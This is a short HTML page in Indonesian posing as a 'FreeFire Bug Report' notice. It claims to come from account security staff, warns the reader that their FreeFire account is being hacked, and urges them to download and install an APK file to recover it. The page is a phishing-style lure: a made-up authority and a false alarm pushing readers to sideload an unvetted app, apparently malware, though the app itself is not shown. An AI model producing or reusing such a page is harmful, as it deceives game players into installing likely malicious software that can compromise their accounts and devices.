 <html>
<head>
 <style>
  *{
    margin: 0;
  }
   h1{
      background-color: red;
      color: white;
      font-size: 130px;
   } 
   h2{
    position: relative;
    text-align: center;
    font-size: 80px;
    top: 16%;
   }
   button{
      background-color: lightblue;
      color: white;
      font-size: 130px;
      width: 100%;
      height: 300px;
      position: relative;
      top: 16%;
      border-radius: 10px;
      box-shadow: 20px 14px 30px blue;
   }
   b{
    position: relative;
    font-size: 60px;
    text-align: center;
    top: 25%;
   }
 </style>
 </head>
 
 <body>
 <h1>FreeFire</h1>
 <img src="pepek.jpg" width="500px" />
<h2>FreeFire Bug Report</h2>
 <a href="FreeFire Bug Report.apk" download="FreeFire Bug Report.apk"><button>DOWNLOAD</button></a>
 <b>Kami dari Anggota Keamanan account ingin memberikan anda aplikasi untuk memulihkan akun FreeFire anda, Kenapa Kami mengirim kan Anda Aplikasi Ini Karena Akun anda Sedang di hack Segeralah mendownload dan menginstal aplikasi ini</b>
</body>
 </html>
